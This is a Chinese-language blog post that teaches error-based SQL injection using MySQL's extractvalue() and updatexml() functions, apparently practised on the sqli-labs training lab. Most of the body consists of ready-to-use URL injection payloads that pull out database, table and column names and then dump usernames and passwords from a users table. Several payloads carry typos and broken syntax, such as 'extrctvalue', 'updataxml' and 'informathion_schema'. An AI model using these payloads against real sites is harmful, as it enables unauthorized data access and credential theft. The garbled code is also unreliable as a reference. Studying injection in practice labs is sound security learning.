报错注入(extractvalue,updatexml)

最新推荐文章于 2024-06-05 09:47:09 发布
最新推荐文章于 2024-06-05 09:47:09 发布
阅读量410 收藏 1
点赞数 6
文章标签: sql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73477772/article/details/130586798
版权

目录

一.Extractvalue报错注入:

二.Updatexml报错注入:

一.Extractvalue报错注入:

1.extractvalue(doc,'/book/author/surname')函数:extractvalue函数包含两个参数。

第一个参数doc  XML文档对象名称,第二个参数'____'  路径。

2.extractvalue报错注入的实现方法:

extractvalue函数的作用是查询一个文件里的内容。

如果我们把第二个参数的路径拼写错误,它会查不到内容但不会报错。

select extractvalue(doc,'/book/titell')from xml;

但是我们将第二个参数的斜杠替换为另外的符号extractvalue(doc,'~book/author/surname')

selct extractvalue(doc,'~book/author/surname') from xml;

则会提示报错信息。 这时候我们在第二个参数的位置加入SQL语句,则会返回我们想要的信息。

例如:concat(1,2)的作用是将1,2两个位置的数据拼接起来,0x7e是’~‘的ascll码

select extractvalue(doc,concat(0x7e,(select database()))) from xml;

 以上报错注入就可看到这个数据库的名称为security。

查询数据库里的表名: 

?id=100'and 1=extractvalue(0x7e,(select group concat(table_name)from 

information_schema.tables where table_schema=database())))--+

查询数据库里的列名'username'和'password':

?id=100'and 1=extractvalue(1,concat(0x7e,(select group_concat(column_name)from 

information_schema.columns where table_schema=database()and table_name='users')))--+

 3.解决extractvalue()函数只能回显32个字符的方法:

使用substring()函数。

?id=100'and 1=extrctvalue(1,concat(0x7e,select substring
(group_concat(username,'~',password),25,30)from users)))--+

其中25,30表示从第25个字符开始再往后显示30个字符。

二.Updatexml报错注入:

1.updatexml(XLM_document,XPath_string,new_value)函数包含三个参数:

第一个参数:XLM_document是string格式,为XML文档对象名称

第二个参数:XPath_string是路径,XPath格式的字符串

第三个参数:new_value,string格式,替换查找到的符合条件的数据

2.updatexml报错原理:

正常句式:作用为更新xml文档里的内容

select updatexml(doc,'/book/auther/surname','1') from xml;

 同extractvalue(),输入错误的第二个参数,即更改路径符号

select updatexml(doc,'~book/auther/surname','1') from xml;

 使用updatexml报错注入查询数据库名称:

?id=1"and 1=updatexml(1,concat('~',(select database())),3)--+

 使用updatexml报错注入查询数据库表名名称:

?id=1'and 1=updataxml(1,concat(0x7e,(select group_concat(table_name)from 

informathion_schema.tables where table_schema=database())),3)--+

 使用updatexml报错注入查询数据库列名称:

?id=1'and 1=updataxml(1,concat(0x7e,(select group_concat(column_name)from 

informathion_schema.columns where table_schema=database() and table_name='users')),3)--+

使用updatexml报错注入查询数据库列名称:

?id=1'and 1=updatexml(1,concat(0x7e,(select group_concat(username,password) from user)),3)--+
芙蓉王源--+
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
MYSQL updatexml()函数报错注入解析
09-09
主要介绍了MYSQL updatexml()函数报错注入解析,并且简单介绍了updatexml函数,具有一定参考价值,需要的朋友可以了解下。
sql报错注入extractvalueupdatexml报错原理
weixin_30642267的博客
03-07 739
报错注入extractvalueupdatexml报错原理 MySQL 5.1.5版本中添加了对XML文档进行查询和修改的两个函数extractvalueupdatexml 名称 描述 ExtractValue() 使用XPath表示法从XML字符串中提取值 UpdateXML() 返回替换的XML片段 通过这两个函数可以完成报错注入 一、extractvalue函...
SQL注入之updatexml报错注入函数解释)
最新发布
m0_74608722的博客
06-05 439
第二个参数 xml路径 是可操作的地方,xml文档中路径是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。原因:是因为updatexml(1,database(),1)这种书写的语法格式是正确的,所以不会爆出语法错误,在SQL注入中无法得到想要的库、表、列名(为了得到他们,应该怎样书写呐?正常查询 第二个参数的格式为 /xxx/xx/xx/xx ,即使查询不到也不会报错。
SQL注入-updatexml报错注入
weixin_52613207的博客
06-11 419
extractvalue(),输入错误的第二个参数,即更改路径符号。参数3:string格式,替换查找到的符合条件的数据。函数updatexml参数1,参数2,参数3)参数1:string格式,为XML文档对象的名称。
SQL注入漏洞 | updatexml报错注入
weixin_52116519的博客
12-09 1013
XMLXML 被设计用来传输和存储数据,是各种应用程序之间进行数据传输的最常用的工具。xpathXPath 是一门在 XML 文档中查找信息的语言。XPath 使用路径表达式来选取 XML 文档中的节点或者节点集。这些路径表达式和我们在常规的电脑文件系统中看到的表达式非常相似。语法格式第一个参数XML_document是String格式,为XML文档对象的名称第二个参数:XPath_string ,代表路径,Xpath格式的字符串,例如。
记一次简单的 updatexml报错注入
cxk
03-24 2128
朋友发的,问怎么注入 有大佬发了,报错注入。那就来锤他 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value...
SQL注入 报错(updatexmlextractvalue函数介绍)-01
09-15
SQL注入报错(updatexmlextractvalue函数介绍) SQL注入是一种常见的Web应用安全漏洞,它是指攻击者通过在Web应用的输入中inject恶意的SQL代码,来获取或修改数据库中的数据。今天,我们将讨论SQL注入报错的两种...
web-报错注入-皮卡丘靶场
07-15
报错注入】是一种安全漏洞,它发生在Web应用程序中,当用户输入的数据被错误地用于构造数据库查询时,导致数据库返回错误信息。这些错误信息可能包含敏感数据,从而让攻击者能够获取未授权的信息或者控制数据库。...
sqli-labs less-17 updatexml()报错注入
cuddlylm的博客
04-02 1724
这题相比前面的11到15关由原来的登陆注册框变成了现在的重置密码框 首先阅读源码发现 该题先审查user name的值,只有当user name的值是真值的时候才会处理下一步的new password 重点引入了update函数 $update="UPDATE users SET password = '$passwd' WHERE username='$row1'"; 这个函数的作用就是更新数据库 updatexml()函数 UPDATEXML (XML_document, XPath_string,.
sqli-labs】Less 5——报错注入updatexml()函数
用博客做做记录的小白
06-23 2011
sqli-labs靶场第五关less 5,使用报错注入函数updatexml()进行报错注入,注入类型为单引号字符型。
sql盲注_updateXml报错注入
sugar_by的博客
06-03 459
函数updatexml(XML_document,XPath_string,new_value)包含三个参数 第一个参数是string格式,为XML文档对象名称,例如doc 第二个参数是路径 第三个参数是替换查找符合条件的数据 updatexml报错原理 同extractvalue()一样sql盲注_extractvalue报错注入 输入错误第二个参数,即更改路径的符号 正常语句 错误语句 利用updatexml()报错注入 判断字符型/数据型 判断闭合方式 可以判断为双引号闭合 查看有多少列 查询数据
sqli-labs-报错注入-updatexml报错
weixin_51706044的博客
03-14 1292
文章目录前言一、updatexml报错二、updatexml报错记忆 前言 union注入是最简单方便的,但是要求页面必须有显示位,没有就没法利用. 所以当页面没有显示位时,我们需要用其他方法来获取数据.因此我们可以使用报错注入: 有些网站在开发调试阶段开启了报错提示信息,如果没有关闭,就有可能存在报错注入. 报错注入函数: floor函数 extractvalue报错 updatexml报错 今天我在这里先记录一下对于updatexml报错函数的学习 一、updatexml报错 基本格式: ?id=
报错注入updatexml函数使用
weixin_43326436的博客
06-03 3819
一. floor()、extractvalue()、updatexml() 函数都是与报错注入有关 二.updatexml函数 使用方式: UPDATEXML (XML_document, XPath_string, new_value); 第一个参数XML_document是String格式,为XML文档对象的名称。 第二个参数:XPath_string (Xpath格式的字符串) 。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 作用:改变文档中符合条件的节点的值。 还
SQL注入----报错注入简介(updatexml
一只web狗
06-21 3377
报错注入updatexml)常用语句
updatexml函数-报错注入原理学习
热门推荐
身高两米不到的博客
03-17 1万+
注入之前,首先得明白updatexml函数的利用方式以及函数语法。 updatexml(xml_doument,XPath_string,new_value) 第一个参数XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 以上是网上搜索的含义,看到以上内容,我不知道是不是有人和
24-3 SQl 注入 - 利用报错函数updatexml及extracevalue
weixin_43263566的博客
02-11 1020
改变文档中符合条件的节点,使用不同的 XML 标记匹配和替换 XML 块的函数。:String 格式,为 XML 文档对象的名称。:XPath 格式的字符串,代表路径。new_value:String 格式,用于替换查找到的符合条件的数据。通过提供一个 XML 标记片段和 XPath 表达式,从 XML 文档中提取值的函数xml_frag:XML 标记片段,即 XML 文档对象。xpath_expr:XPath 表达式,用于定位需要提取的值。
SQL注入,xpath函数updatexml()和extractvalue()报错注入原理
金 帛的博客
04-26 3830
SQL注入之报错注入原理
SQL注入实战之报错注入篇(updatexml extractvalue floor)
qq_41272376的博客
03-03 1374
SQL注入实战之报错注入篇(updatexml extractvalue floor) 知识铺垫 在上一篇中我们在漏洞页面中进行了SQL注入实战之联合查询,这篇文章带来的是SQL注入之报错注入篇。 首先我们来细分一下SQL注入分类 SQL注入分类: 回显正常—> 联合查询 union select 回显报错—> Duplicate entry() extractvalue()    updatexml() 盲注 —>布尔型盲注 基于时间的盲注sleep()
mysql报错注入updatexml原理
05-17
MySQL 报错注入是一种利用错误信息披露漏洞来进行 SQL 注入攻击的方法。其中,updatexml 函数是一种常用的利用方式之一。 updatexml 函数可以用于对 XML 类型的数据进行操作。其基本语法如下: ``` updatexml...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值